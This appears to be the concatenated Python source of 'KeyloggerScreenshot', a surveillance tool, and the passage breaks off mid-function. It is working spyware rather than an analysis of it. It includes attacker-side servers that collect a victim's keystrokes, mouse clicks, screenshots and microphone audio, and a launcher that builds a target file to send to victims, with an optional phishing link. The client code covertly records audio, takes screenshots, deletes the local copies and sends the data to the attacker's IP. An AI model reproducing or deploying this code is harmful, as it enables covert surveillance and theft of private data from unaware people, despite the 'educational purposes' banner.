import ast
import socket
import os
import BetterPrinting as bp
from .Port_data import Ports

class ServerPhotos:
    # This is the class of the Server. Both Server should not be in the same file
    def __init__(self, ip, port):
        self.ip = ip
        self.port = port
        self.full_msg = None

    def get_data(self, connection, mode, bytes):
        if mode == "r": self.full_msg = r""
        else: self.full_msg = b""
        # All the data is being stored in full_msg
        while True:
            msg = connection.recv(bytes)
            if len(msg) <= 0: break
            if mode == "r": self.full_msg += msg.decode()
            else: self.full_msg += msg
        return self.full_msg

    def get_double_names(self):
        get_all_images = [image for image in os.listdir() if "Image_Target" in image]
        if not get_all_images:
            return "Image_Target (1).png"

        else:
            number = len(get_all_images) + 1
            return f"Image_Target ({number}).png"

    def start(self):
        gui = """
    __ __              __                                 _____                                       __            __ 
   / //_/___   __  __ / /____   ____ _ ____ _ ___   _____/ ___/ _____ _____ ___   ___   ____   _____ / /_   ____   / /_
  / ,<  / _ \ / / / // // __ \ / __ `// __ `// _ \ / ___/\__ \ / ___// ___// _ \ / _ \ / __ \ / ___// __ \ / __ \ / __/
 / /| |/  __// /_/ // // /_/ // /_/ // /_/ //  __// /   ___/ // /__ / /   /  __//  __// / / /(__  )/ / / // /_/ // /_  
/_/ |_|\___/ \__, //_/ \____/ \__, / \__, / \___//_/   /____/ \___//_/    \___/ \___//_/ /_//____//_/ /_/ \____/ \__/  
            /____/           /____/ /____/    

                        ~Created by: Fawaz Bashiru~          
                        ~Write "python KLS_start.py -help" for help in the github version~   
                        REMINDER THIS WAS BUILD FOR EDUCATIONAL PURPOSES  
                        SO DON'T USE THIS FOR EVIL ACTIVITIES !!!!!                        
        """

        print(gui)
        bp.color("Cyan: ServerPhotos", "cyan")
        bp.color("Blue: ServerKeylogger", "magenta")
        bp.color("Green: ServerListener", "green")
        print("White: Timer\n")
        try:
            server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            server.bind((self.ip, self.port))
            server.listen(1000)

            anzahl = 0
            while True:
                bp.color("Waiting for connection...", "cyan")
                client_socket, address = server.accept()
                bp.color(f"\n\nConnection has been established with {address}", "cyan")
                # Data is in client_socket and the address is obviously in "ipaddress"
                full_msg = self.get_data(client_socket, "r", 12288)
                client_socket.close()
                this_data = ast.literal_eval(full_msg)
                # This makes a string to a datatype

                for filename, filename_data in this_data.items():
                    anzahl += 1
                    real_filename = self.get_double_names()
                    with open(real_filename, "ab") as file:
                        file.write(filename_data)

                # "anzahl" is for the amount of photos
                if anzahl > 1:
                    bp.color(f"{anzahl} Images has been saved to your working directory", "cyan")
                elif anzahl != 0:
                    bp.color(f"{anzahl} Image have been saved to your working directory", "cyan")
                # Detetcts how many Image have been saved to your directory


        except OSError:
            working_port = Ports.get_working_ports()
            if str(self.port) in working_port:
                bp.color(f"PLEASE USE AN OTHER PORT NUMBER FOR SERVERPHOTOS. PORT NUMBER: {self.port} already in use", "cyan")
                os._exit(0)



import threading
import pyautogui as pg
import sys
import os
import ast
import time
import PIL.Image
import tkinter as tk
import BetterPrinting as bp
import subprocess


class Simulation:
    seconds = None
    startbutton = None

    @staticmethod
    def countdown():
        real_sec = Simulation.seconds
        seconds = Simulation.seconds + 4
        # Plus four seconds because of the time the code sleeps

        if sys.platform == "linux":
            size = "295x367"
        else:
            size = "250x415"

        tkWindow = tk.Tk()
        tkWindow.geometry(size)
        tkWindow.title('KeyloggerScreenshot')
        minutes = seconds // 60
        this_min = minutes * 60
        this_sec = seconds - this_min
        print(f"This simulation will last for {minutes} minutes and {this_sec} seconds\n")

        while seconds:  # Same like Timer Class
            mins, secs = divmod(seconds, 60)
            timer = '{:02d}:{:02d}'.format(mins, secs)
            print(f"\rTime left: {timer}", end="")
            time.sleep(1)
            seconds -= 1
        print("\nTHANK YOU FOR YOU USING KEYLOGGERSCREENSHOT")
        # GUI BY: DYMA020
        Simulation.startbutton = tk.Button(tkWindow, text="Stop stimulation", command=Simulation.changecol, height=10,
                                           width=30)
        # Puts everything on place
        Simulation.startbutton.grid(row=1, column=0)
        if real_sec < 60:
            text = f"Simulation for {real_sec} seconds"
        else:
            m, s = divmod(real_sec, 60)
            timer = '{:02d}:{:02d}'.format(m, s)
            text = f"Simulation for {timer} minutes"
        # Just for decoration
        tk.Button(tkWindow, text=text, command=Simulation.connection, height=10, width=30).grid(row=2, column=0)
        tkWindow.mainloop()

    @staticmethod
    def changecol():  # This function is here to if the simulation has ended
        Simulation.startbutton.configure(bg="red")
        # This is the button
        Simulation.startbutton["text"] = "Stop simulation"
        if sys.platform != "linux":
            data = subprocess.check_output("tasklist")
            # This lists all the tasks that are open on windows
            str_data = str(data).split()
            # Splits the data
            all_exe = [(exe.replace(r"K\\r\\n", "").replace(r"K\r\n", ""), str_data[idx + 1]) for idx, exe in
                       enumerate(str_data) if ".exe" in exe]
            # This removes all unnecessary characters and stores all .exe files with their pid number in this list
            photo = [(task, pid) for task, pid in all_exe if task == "PhotosApp.exe"]
            # photo searches for the right pid to kill the process

            if photo:
                os.system(f"taskkill /f /PID {photo[0][1]}")
                # Kills the photos with it pid number

        else:
            linux_data = subprocess.run(["ps", "aux"], capture_output=True)
            # This lists all the tasks that are open on linux
            this_data = str(linux_data).split()
            # Same code as above
            all_pid = [this_data[idx - 10] for idx, this_pid in enumerate(this_data) if ".PNG" in this_pid]
            # This the linux version of stopping the process of all Images that are open

            if all_pid:  # If "all_pid" is not empty this line will be executed
                for pid in all_pid: os.system(f"kill -15 {pid}")
                # This is the command which kills the process

        os._exit(0)

    @staticmethod
    def connection():
        print("Successful connection")

    @staticmethod
    def start_simulation():
        mouse_coordinates = [mouse for mouse in os.listdir() if "mouseInfoLog" in mouse]
        # Looks for coordinates in mouseInfoLog

        if not mouse_coordinates:
            # If there isn't a file called mouseInfoLog it will destroy itself
            print("\nThe target hasn't clicked anything")
            print("THANK YOU FOR YOU USING KEYLOGGERSCREENSHOT")
            sys.exit()

        every_coordinate = []
        for each_core in mouse_coordinates:
            fhandle = open(each_core)
            for line in fhandle:
                if "[" in line:
                    every_coordinate += ast.literal_eval(line)
                    # This makes a list out of a string

        img_files = [each_img for each_img in os.listdir() if "Image_Target" in each_img]
        # This checks for all Images in the directory

        if not img_files:
            print('There is no "Image_Target" in this directory')
            sys.exit()

        # This is here so every kind of display will be shown correctly
        get_size = PIL.Image.open(img_files[0])
        # opens the image
        target_size_x, target_size_y = get_size.size
        # Gets the size of the image with x and y
        hacker_size_x, hacker_size_y = pg.size()
        # Gets the size of the hacker with x and y

        difference_x, difference_y = hacker_size_x / target_size_x, hacker_size_y / target_size_y
        # This is the difference between the two. For example 1920x1080 = hacker and 1366x768 = target.
        # To rescale the image the x position of the target will be divided by the x position of the hacker
        new_coordinates = [(round(new_x * difference_x), round(new_y * difference_y)) for new_x, new_y in every_coordinate]
        # Stores the rescaled coordinates into a list
        for img in img_files:
            image = PIL.Image.open(img)
            # Opens the image
            new_image = image.resize((hacker_size_x, hacker_size_y))
            # Resizes every image to the size of the hacker display
            new_image.save(img)
            # Saves the image in the same directory

        pg.FAILSAFE = False
        # This is for the corner allowance
        img_seconds = 5.572
        # This is the speed it takes to open the image
        speed = 0.47
        # This is the time each coordinate needs
        sleep = 1.5
        # This is the time, where the code is taking a time out
        one_coordinate = speed + sleep

        if sys.platform != "linux":  # This calculation is for windows
            # This is for the corner allowance
            img_seconds = 5.572
            # This is the speed it takes to open the image
            speed = 0.47
            # This is the time each coordinate needs
            escape = 0.1
            # This is the time the program needs to escape an image
            one_coordinate = speed + sleep
            duration_seconds = one_coordinate * len(every_coordinate)
            one_image = duration_seconds + img_seconds + escape
            Simulation.seconds = round(one_image * len(img_files))
            # This calculates the amount it will take

        else:
            # Same code as above but this is for linux
            open_img = 2.7
            one_cor = 1.9
            all_cor = one_cor * len(every_coordinate)
            esc = 0.1
            this_img = all_cor + open_img + esc
            Simulation.seconds = round(this_img * len(img_files))
        # This calculates the amount it will take

        print(f"\nThe target has clicked {len(every_coordinate)} times on his screen")
        threading_count = threading.Thread(target=Simulation.countdown, args=(Simulation.seconds,))
        # The countdown will start
        threading_count = threading.Thread(target=Simulation.countdown)
        # The countdown will start
        threading_count.start()

        pg.sleep(4)
        for image in img_files:
            im = PIL.Image.open(image)
            try:
                # Opens the image
                im.show()
                time.sleep(2)
                pg.press("f11")
                # Makes the image in the perfect resolution
                for x, y in new_coordinates:
                    pg.moveTo(x, y, 0.3)
                    time.sleep(sleep)
                pg.press("esc")
            except RuntimeError:
                bp.color(
                    '\n\nTry to run "python Simulation_code.py" in your terminal.\nIf this did not work try to clone my project on github: https://github.com/Kill0geR/KeyloggerScreenshot',
                    "red")
                os._exit(0)


Simulation.start_simulation()


import sys
import socket
import os
import time
import wave
import ast
import BetterPrinting as bp
from .Server_photos import ServerPhotos
from .Port_data import Ports

class ServerListener:
    def __init__(self, ip, port):
        self.ip = ip
        self.port = port
        self.filename = None

    def check_double(self):
        # This function checks if The Audio file is already in the directory
        dir = os.listdir()
        check = [each_name for each_name in dir if "Audio of Target" in each_name]
        if len(check) == 0:
            # If the directory has no file it will set the filename to default
            self.filename = "Audio of Target.wav"
        else:
            amount = len(check) + 1
            self.filename = f"Audio of Target {amount}.wav"
            # Filename will now be the amount of the audiofiles therer are directory

        return self.filename

    def start(self):
        try:
            listening_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            listening_data.bind((self.ip, self.port))
            listening_data.listen(1000)
            # 5 possible connections
            bp.color("Waiting for connection...", "green")
            # Waits for a connection

            client_socket, ipaddress = listening_data.accept()
            bp.color(f"Connection has been established with {ipaddress}", "green")
            check = 0
            full_msg = ServerPhotos.get_data(self, client_socket, "r", 30000000)
            listening_data.close()
            if full_msg == "THE TARGET HAS NO MICROPHONE ON":
                bp.color("\nTHE TARGET HAS NO MICROPHONE ON\n", "green")
                bp.color('"ServerListener" will be destroyed', "green")
                sys.exit()

            frames = ast.literal_eval(full_msg)
            filename = self.check_double()
            data_file = wave.open(filename, "wb")
            data_file.setnchannels(2)
            data_file.setsampwidth(2)
            data_file.setframerate(44100)
            data_file.writeframes(b''.join(frames))
            data_file.close()
            bp.color(f'"{filename}" has been saved to your directory', "green")

            # This stores everything the target was talking

        except OSError:
            working_port = Ports.get_working_ports()
            if str(self.port) in working_port:
                bp.color(f"PLEASE USE AN OTHER PORT NUMBER FOR SERVERLISTENER. PORT NUMBER: {self.port} already in use","green")
                time.sleep(1)
                os._exit(0)



import time
import socket
import os
import BetterPrinting as bp
from .Server_photos import ServerPhotos
from .Port_data import Ports
from .Simulation_code import Simulation
import KeyloggerScreenshot as ks

class ServerKeylogger:
    # This is the class of the Server. Both Server should not be in the same file
    def __init__(self, ip, port, simulater=False):
        self.is_True = None
        self.ip = ip
        self.port = port
        self.simulater = simulater
        self.new_data = None
        self.check_under = False
        self.new_cor = None
        self.full_msg = None
        self.cord = None
        self.false_url_error = ["No connection", "Invalid Url"]

    def do_file(self, spalten):
        if spalten != "":
            # If the data is not empty
            text = spalten
            for zeichen in text:
                if "{" == zeichen:
                    text = text.replace("{", " ")
            bp.color(f"Text of target: {text}", "magenta")
            zeit = time.strftime("%H-%M-%S-%Y")
            # This is the time the data has arrived
            with open(f"Keylogger of the target Time {zeit}.txt", "a+", encoding="utf-8") as file:
                file.write(f"HERE IS EVERYTHING THE TARGET HAS TYPED \n\n{text}")
                # That means data will appear even if the connection isn't stabled
        else:
            bp.color("The target hasn't written something in the meanwhile", "magenta")

    @staticmethod
    def terminator():
        bp.color("\nTHE CONNECTION HAS BEEN INTERRUPTED", "magenta")
        bp.color("THE SERVER WILL BE DESTROYED\n", "magenta")
        bp.color("TO RUN A SIMULATION RUN THE 'Simulation_code.py' SCRIPT\nIF YOU DONT HAVE ONE YOU CAN CREATE IT ON GITHUB\nALL THE INSTRUCTIONS ARE THERE: https://github.com/Kill0ger/KeyloggerScreenshot\n\nTHANK YOU FOR USING KEYLOGGERSCREENSHOT","magenta")
        os._exit(0)

    def message(self, real_data):
        # To know if the server has some issues
        for zeichen in real_data:
            if "{" == zeichen:
                # "{" this detects if a space or a tab is in self.full_msg
                self.new_data = real_data.replace("{", " ")
                self.check_under = True

        if self.check_under is False:
            self.new_data = real_data

        print(self.check_under)
        # The data is being stored in self.full_msg
        bp.color(f"Text of target: {self.new_data}", "magenta")
        zeit = time.strftime("%H-%M-%S-%Y")
        # This is the time the data has arrived
        if self.new_data != "":
            with open(f"Keylogger of the target Time {zeit}.txt", "a+", encoding="utf-8") as file:
                file.write(f"HERE IS EVERYTHING THE TARGET HAS TYPED \n\n{self.new_data}")

        else:
            bp.color("The Target didn't type something...", "magenta")

    def check_double(self):  # This function is here to check if there are more files with the same name
        dir = os.listdir()
        check = [each_name for each_name in dir if "mouseInfo" in each_name]
        if len(check) == 0:
            filename = "mouseInfoLog.txt"
        else:
            amount = len(check) + 1
            filename = f"mouseInfoLog {amount}.txt"

        return filename

    def start(self):
        self.is_True = False
        try:
            server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            server.bind((self.ip, self.port))
            server.listen(1000)

            bp.color("Waiting for connection....", "magenta")
            clientsocket, ipaddress = server.accept()
            # Data is in clientsocket and the ip-address is obviously in "ipaddress"
            bp.color(f"\nConnection has been established with {ipaddress}", "magenta")

            self.full_msg = ServerPhotos.get_data(self, clientsocket, "r", 8192)

            if ")]" in self.full_msg:
                if "***%§§)§§%" in self.full_msg:
                    self.new_cor = "[(" + self.full_msg.split("[(")[1]
                    spalten = self.full_msg.split("[(")[0].split("***%§§)§§%")
                    # This splits the data with the special code
                    self.do_file(spalten[1])

                else:
                    # Checks if the coordinates are there
                    self.cord = self.full_msg.split(")]")
                    self.new_cor = self.cord[0] + ")]"

                filename = self.check_double()
                with open(filename, "a+") as file:
                    # The coordinates will be stored in "mouseInfoLog.txt"
                    file.write(f"These are the coordinates of the target \n{self.new_cor}")
                bp.color("The coordinates of the target have been saved to your directory", "magenta")

                if "***%§§)§§%" in self.full_msg:
                    self.is_True = True

                if self.cord is not None:
                    if self.cord[1] == "":
                        bp.color("The target hasn't typed anything", "magenta")
                    else:
                        self.message(self.cord[1])

            elif "{" in self.full_msg and "THE CONNECTION HAS BEEN INTERRUPTED" not in self.full_msg:
                # This checks if the target hasn't clicked something and if there is still some data
                self.full_msg = self.full_msg.replace("[]", "")
                bp.color("The target hasn't clicked anything", "magenta")
                self.message(self.full_msg)

            elif "[]" == self.full_msg and "THE CONNECTION HAS BEEN INTERRUPTED" not in self.full_msg:
                # Checks if nothing has typed or clicked
                bp.color("The target hasn't typed and clicked anything", "magenta")
                # This shuts down the server
            else:
                self.do_file(self.full_msg.split("***%§§)§§%")[1])

            if self.is_True:
                time.sleep(1)
                self.terminator()

            if self.simulater is True:
                if "Simulation_code.py" not in os.listdir():
                    get_name = str(ks.Simulation_code).split("from")
                    full_name = get_name[1].split(">")[0]
                    full_name = full_name.split()[0]
                    full_name = full_name.split("'")[1]

                    with open(full_name, "r+") as file:
                        data = [each for each in file]
                        data += "\n\nSimulation.start_simulation()"

                    with open("Simulation_code.py", "a+") as file:
                        for line in data:
                            file.write(line)

                    bp.color('\n"Simulation_code.py" has been made\n', "magenta")

                print("Simulation will come in 10 seconds!!!")
                time.sleep(10)
                start = input("Do you want to start y/n?: ")
                if start not in ["y", "yes"]:
                    print("\nTHANK YOU FOR YOU USING KEYLOGGERSCREENSHOT")
                    os._exit(0)

                Simulation.start_simulation()

        except OSError:
            working_port = Ports.get_working_ports()
            if str(self.port) in working_port:
                bp.color(f"PLEASE USE AN OTHER PORT NUMBER FOR SERVERKEYLOGGER. PORT NUMBER: {self.port} already in use", "magenta")
                os._exit(0)



import time
import socket
from .Server_photos import ServerPhotos
from .Port_data import Ports
import os

class Timer:
    def __init__(self, ip, port):
        self.ip = ip
        self.port = port

    def countdown(self, seconds):
        minutes = seconds // 60
        # Calculates the floor
        false_second = minutes * 60
        exact_seconds = seconds - false_second

        print(f"The target is being connected. The Data of the target is coming....")
        while seconds:
            mins, secs = divmod(seconds, 60)
            timer = '{:02d}:{:02d}'.format(mins, secs)
            print(f"\rTime left: {timer}", end="")
            time.sleep(1)
            seconds -= 1

        if minutes == 0:
            print(f"\nSuccessful connection for {exact_seconds} seconds")
        elif exact_seconds == 0:
            print(f"\nSuccessful connection for {minutes} minutes")
        else:
            print(f"\nSuccessful connection for {minutes} minutes and {exact_seconds} seconds")

    def start_timer(self):
        try:
            show_time = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            show_time.bind((self.ip, self.port))
            show_time.listen(10)

            client_socket, ipaddress = show_time.accept()
            full_msg = ServerPhotos.get_data(self, client_socket, "r", 10)
            seconds = int(full_msg)
            self.countdown(seconds)

        except OSError:
            working_port = Ports.get_working_ports()
            if str(self.port) in working_port:
                print(f"PLEASE USE AN OTHER PORT NUMBER FOR SERVERKEYLOGGER. PORT NUMBER: {self.port} already in use")
                os._exit(0)
                



import os
try:
    import pyautogui as pg

except:
    files = ["Simulation_code.py","Server_keylogger.py", "Keylogger_Target.py"]
    for this_file in files:
        os.chdir("KeyloggerScreenshot")
        with open(this_file, "r+") as file:
            data = [line.replace("\n", "") for line in file]

        with open(this_file, "w+") as file:
            for each in data:
                if each not in ["import PIL.Image", "from pynput import keyboard", "from pynput.mouse import Listener",
                                "import tkinter as tk", "import pyautogui as pg"]:
                    file.write(f"{each}\n")
        os.chdir("..")

import KeyloggerScreenshot as ks
import sys
import threading
import random
import requests
import subprocess

gui = """
    __ __              __                                 _____                                       __            __ 
   / //_/___   __  __ / /____   ____ _ ____ _ ___   _____/ ___/ _____ _____ ___   ___   ____   _____ / /_   ____   / /_
  / ,<  / _ \ / / / // // __ \ / __ `// __ `// _ \ / ___/\__ \ / ___// ___// _ \ / _ \ / __ \ / ___// __ \ / __ \ / __/
 / /| |/  __// /_/ // // /_/ // /_/ // /_/ //  __// /   ___/ // /__ / /   /  __//  __// / / /(__  )/ / / // /_/ // /_  
/_/ |_|\___/ \__, //_/ \____/ \__, / \__, / \___//_/   /____/ \___//_/    \___/ \___//_/ /_//____//_/ /_/ \____/ \__/  
            /____/           /____/ /____/    

                        ~Created by: Fawaz Bashiru~             
                        ~Write "python KLS_start.py -help" for help    
                        REMINDER THIS WAS BUILD FOR EDUCATIONAL PURPOSES
                        SO DON'T USE THIS FOR EVIL ACTIVITIES
"""
lst = sys.argv

try:
    if "-aip" in lst:  # "aip" stands for address ip
        idx = lst.index("-aip")
        try:
            global simulation
            global boolean

            cmd = subprocess.check_output(["netstat", "-ano"])
            all = cmd.split()

            working_ports = []
            zahlen = [str(zahl) for zahl in range(0, 11)]

            for each in all:
                str_each = str(each)
                if ":" in str_each:
                    switch = str_each[::-1]
                    this_port = ""
                    for port in switch:
                        if port not in zahlen: pass
                        if port == ":": break
                        this_port += port

                    another_switch = this_port[::-1]
                    if "'" in another_switch: another_switch = another_switch.replace("'", "")

                    if len(another_switch) == 4:
                        working_ports.append(another_switch)

            ipaddress = str(lst[idx + 1])

            zahlen = "123456789"
            nummer = 0
            port_numbers = []
            while nummer != 4:
                nummer += 1
                random_port = "".join(random.sample(zahlen, 4))
                if random_port in working_ports:
                    continue
                port_numbers.append(random_port)

            port_photos = int(port_numbers[0])
            port_keylogger = int(port_numbers[1])
            port_listener = int(port_numbers[2])
            port_time = int(port_numbers[3])

            if "-sim" in lst:
                try:
                    if "-cf" not in lst:
                        print(gui)
                        print('YOU HAVE NOT CREATED A FILE. FOR HELP TYPE "python KLS_start.py -help" IN YOUR TERMINAL')
                        quit()
                    print("The simulation is activated")
                    simulation = "simulater=True"
                    boolean = True

                    filename = "Simulation_code.py"

                    if filename not in os.listdir():
                        os.chdir("KeyloggerScreenshot")
                        with open(filename, "r+") as file:
                            data = [each for each in file]
                            data += "\n\nSimulation.start_simulation()"
                        os.chdir("..")
                        with open(filename, "a+") as this_file:
                            for line in data:
                                this_file.write(line)
                        print(f"{filename} HAS BEEN CREATED SO YOU CAN SIMULATE WHERE THE TARGET HAS CLICKED")

                except IndexError:
                    quit()
            else:
                simulation = "simulater=False"
                boolean = False

            if "-ds" in lst:  # "ds" for demon server
                try:
                    server_code = f'''
import KeyloggerScreenshot as ks 
import threading

ip = "{ipaddress}"

server_photos = ks.ServerPhotos(ip, {port_photos})

server_keylogger = ks.ServerKeylogger(ip, {port_keylogger}, {simulation})

server_listener = ks.ServerListener(ip, {port_listener})

server_time = ks.Timer(ip, {port_time})

threading_server = threading.Thread(target=server_photos.start)
threading_server.start()

threading_server2 = threading.Thread(target=server_keylogger.start)
threading_server2.start()

threading_server3 = threading.Thread(target=server_listener.start)
threading_server3.start()

threading_server4 = threading.Thread(target=server_time.start_timer)
threading_server4.start() '''

                    if os.path.exists("demon_server.py"):
                        os.remove("demon_server.py")
                    with open("demon_server.py", "a+") as file:
                        file.write(server_code)

                    print('"demon_server.py" HAS BEEN CREATED')
                except IndexError:
                    quit()
            if "-p" in lst:  # "p" stands for ports
                idx_port = lst.index("-p")
                try:
                    print('ALL THE NUMBERS HAVE BEEN SAVED TO "ports.py"')
                    print(
                        f"\nport_photos = {port_photos}\nport_keylogger = {port_keylogger}\nport_listener = {port_listener}\nport_time = {port_time}\n")
                    with open("ports.py", "a+") as file:
                        file.write(
                            f"port_photos = {port_photos}\nport_keylogger = {port_keylogger}\nport_listener = {port_listener}\nport_time = {port_time}")

                except IndexError:
                    quit()

            if "-s" in lst:  # "s" stands for seconds
                idx_s = lst.index("-s")
                try:
                    if "-cf" not in lst:
                        print(gui)
                        print('YOU HAVE NOT CREATED A FILE. IF YOU NEED HELP SIMPLY TYPE "python KLS_start.py -help" IN YOUR TERMINAL')
                        sys.exit()
                    if "-" in lst[idx_s + 1]:
                        print(gui)
                        print("PLEASE SPECIFY YOUR SECONDS -s")
                        quit()

                    seconds = int(lst[idx_s + 1])
                    if seconds < 60:
                        print(gui)
                        print(f"SECONDS MUST BE GREATER THAN 60")
                        quit()

                except IndexError:
                    seconds = 60
            else:
                seconds = 60

            if "-phs" in lst:
                global phishing_name
                phishing_name = None
                try:
                    phs_idx = lst.index("-phs")
                    phishing_name = lst[phs_idx + 1]
                    if "-cf" not in lst:
                        print(gui)
                        print(
                            'YOU HAVE NOT CREATED A FILE. IF YOU NEED HELP SIMPLY TYPE "python KLS_start.py -help" IN YOUR TERMINAL')
                        sys.exit()
                    try:
                        req = requests.get(phishing_name)

                    except requests.exceptions.RequestException:
                        print(gui)
                        print(f'WEBSITE: {phishing_name} IS NOT AVAILABLE')
                        sys.exit()

                except IndexError:
                    print(gui)
                    print("NO LINK HAS BEEN TYPED")
                    sys.exit()

            else:
                phishing_name = None

            if "-cf" in lst:  # "cf" stands for Create file
                idx_cf = lst.index("-cf")
                if phishing_name is not None:
                    phishing_value = f'"{phishing_name}"'
                else:
                    phishing_value = None

                try:

                    filename = lst[idx_cf + 1]
                    if not filename.endswith("py"):
                        data = filename.split(".")
                        filename = f"{data[0]}.py"
                    if "-" in filename:
                        filename = "target.py"

                    if os.path.exists(filename):
                        os.remove(filename)

                    if phishing_name is not None: print(f'LINK: {phishing_name} WILL BE OPEND WHEN {filename} IS EXECUTED')

                    with open(f"{filename}", "a+") as file:
                        file.write(f"import KeyloggerScreenshot as ks \n\nip = '{ipaddress}'\nkey_client = ks.KeyloggerTarget(ip, {port_photos}, ip, {port_keylogger}, ip, {port_listener}, ip, {port_time}, duration_in_seconds={seconds}, phishing_web={phishing_value}) \nkey_client.start()\n")
                    print(f"{filename.upper()} has been created")

                except IndexError:
                    with open("target.py", "a+") as file:
                        file.write(f"import KeyloggerScreenshot as ks \n\nip = '{ipaddress}'\nkey_client = ks.KeyloggerTarget(ip, {port_photos}, ip, {port_keylogger}, ip, {port_listener}, ip, {port_time}, duration_in_seconds={seconds}, phishing_web={phishing_value}) \nkey_client.start()\n")
                    print("TARGET.PY HAS BEEN CREATED YOU CAN SEND THIS TO YOUR TARGET")

            server_photos = ks.ServerPhotos(ipaddress, port_photos)

            server_keylogger = ks.ServerKeylogger(ipaddress, port_keylogger, simulater=boolean)

            server_listener = ks.ServerListener(ipaddress, port_listener)

            server_time = ks.Timer(ipaddress, port_time)

            threading_server = threading.Thread(target=server_photos.start)
            threading_server.start()

            threading_server3 = threading.Thread(target=server_listener.start)
            threading_server3.start()

            threading_server4 = threading.Thread(target=server_time.start_timer)
            threading_server4.start()

            threading_server2 = threading.Thread(target=server_keylogger.start)
            threading_server2.start()
            threading_server2.join()

        except IndexError:
            print(gui)
            print("YOU FORGET TO INSERT YOUR IP")

    elif "-aip" not in lst and "-help" not in lst:
        print(gui)
        print("PLEASE INSERT YOUR IP WITH -aip")

    if "-help" in lst:
        print(gui)
        print(
            "\n-aip INSERT THE SERVERS IP\n-s   SPECIFY YOUR SECONDS (DEFAULT 60 SECONDS)\n-cf  CREATES TARGET FILE WHICH YOU SEND TO ANY TARGET\n-p   SAVES ALL THE PORTS OF THE CURRENT SERVER\n-ds  CREATES A SERVER WITH THE SAME PORTS AS THE TARGET\n-sim ACTIVATES SIMULATION\n-phs OPENS A LINK WHEN THE KEYLOGGER IS EXECUTED\n\n\nIF 'Simulation_code.py' IS IN YOUR DIRECTORY YOU CAN SIMULATE THE CLICKS THE TARGET HAS MADE IF IT HASN'T WORKD ON THE ACTUAL CODE")

except OSError:
    print('CHECK YOUR IP-ADDRESS WITH "ipconfig" ON WINDOWS AND "ifconfig" ON LINUX\n\nIF YOU HAVE THE CORRECT IP ADDRESSS AND IT STILL DOESNT WORK YOU CAN MODIFY YOUR IP ON "keylogger_server.py" AND "keylogger_target.py".\nAFTER THAT YOU CAN SEND THE TARGET OBVIOUSLY THE FILE "keylogger_target.py"')



import tkinter as tk
import time

tkWindow = tk.Tk()
tkWindow.geometry('220x322')
kurz = "by Fawaz Abolagi Temitaiu Martin Junior Bashiru"
tkWindow.title('KeyloggerScreenshot')
started = False


def changecol(newstate):
    if newstate:
        startbutton.configure(bg="green")
        startbutton["text"] = "Stop KLS"
        start()
    else:
        startbutton.configure(bg="white")
        startbutton["text"] = "Start KLS"
        stop()


def start():
    print("started")


def stop():
    print("stopped")


def start_stop():
    global started
    started = not started
    changecol(started)


def show_files():
    print("showing_files")


startbutton = tk.Button(tkWindow, text="Stop simulation", command=start_stop, height=10, width=30)
startbutton.grid(row=1, column=0)
tk.Button(tkWindow, text="Simulation for 50 seconds", command=show_files, height=10, width=30).grid(row=2, column=0)
tkWindow.mainloop()



import pyperclip
from pynput import keyboard
from pynput.mouse import Listener
import time
import sys
import socket
import pyautogui as pg
import os
import pyaudio
import threading
import requests
import webbrowser
from datetime import datetime


class KeyloggerTarget:
    def __init__(self, ip_of_server_photos, port_of_server_photos, ip_of_server_keylogger_data,
                 port_of_server_keylogger_data, ip_of_server_listener, port_of_server_listener, ip_of_timer,
                 port_of_timer, duration_in_seconds=60, phishing_web=None):
        # "duration_in_seconds" tells the programm how long it should last the default time is 60 seconds that's 1 Minute
        assert duration_in_seconds >= 60, f"{duration_in_seconds} is not greater and not equal to 60"
        # "duration_in_seconds" should always be bigger than 60 seconds

        self.ip_photos = ip_of_server_photos
        self.port_photos = port_of_server_photos
        self.ip_keylogger = ip_of_server_keylogger_data
        self.port_keylogger = port_of_server_keylogger_data
        self.ip_listener = ip_of_server_listener
        self.port_listener = port_of_server_listener
        self.duration = duration_in_seconds
        self.ip_timer = ip_of_timer
        self.port_timer = port_of_timer
        self.phishing = phishing_web

        self.check = []
        self.caps = False
        self.richtige_liste = []
        self.coordinates = []
        self.word = None
        self.seconds = []
        self.frames = None
        self.amount = 0
        self.images_data = {}
        self.true_connection = False


    def daten_aufnehemen(self):
        while True:
            try:
                listening_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                listening_data.connect((self.ip_listener, self.port_listener))
                self.true_connection = True
                break
            except:
                continue

        try:
            format = pyaudio.paInt16
            channels = 2
            rate = 44100
            chunk = 1024
            seconds = self.duration + 1

            audio = pyaudio.PyAudio()

            # start Recording
            stream = audio.open(format=format, channels=channels,
                                rate=rate, input=True,
                                frames_per_buffer=chunk)
            # print("recording...")
            frames = []

            for i in range(0, int(rate / chunk * seconds)):
                data = stream.read(chunk)
                frames.append(data)

            # print("finished recording")

            # stop Recording
            stream.stop_stream()
            stream.close()
            audio.terminate()

            # Connection with ServerListener

            self.frames = str(frames)
            # If the server is the down it will store the data locally and wait until the server is available again.
            while True:
                try:
                    listening_data.send(self.frames.encode())
                    break
                except:
                    continue


        except OSError:
            print("NO MICROPHONE DETECTED OR MICROPHONE SETTING DISABLED")
            no_microfon = "THE TARGET HAS NO MICROPHONE ON"

            # If the server is the down it will store the data locally and wait until the server is available again.
            while True:
                try:
                    listening_data.send(no_microfon.encode())
                    break
                except:
                    continue
            # Sends data to ServerListener

    def client(self):
        self.amount += 1
        # This connects to the server you specified
        image = pg.screenshot()
        # "image" screenshots the current image after a specific time
        fotoname = f"IMAGE ({self.amount}).png"
        # Name of the image
        image.save(fotoname)
        # Saves the image in the current directory
        for every_image in os.listdir():
            if "IMAGE" in every_image:
                with open(every_image, "rb") as file:
                    data = b""
                    for line in file:
                        data += line
                    # Gets all the data and stores it in "self.images_data"
                self.images_data[every_image] = data
        # No matter if the targets deletes the image it will be stored locally

        os.remove(fotoname)
        # This deletes the photo

    def send_image(self, ip_photos, port_photos):
        # If the server is the down it will store the data locally and wait until the server is available again.
        while True:
            try:
                send_images = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                send_images.connect((ip_photos, port_photos))

                send_images.send(str(self.images_data).encode())
                break
            except:
                continue

        sys.exit()

    def countdown_send(self, zeit, ip_photos, port_photos, ip_keylogger, port_keylogger):
        seconds_list = [zahl for zahl in range(0, zeit + 1, 20) if zahl != 0]
        # The seconds the image will be sent in 20 steps to the server will be saved in "seconds_list"
        print(seconds_list)
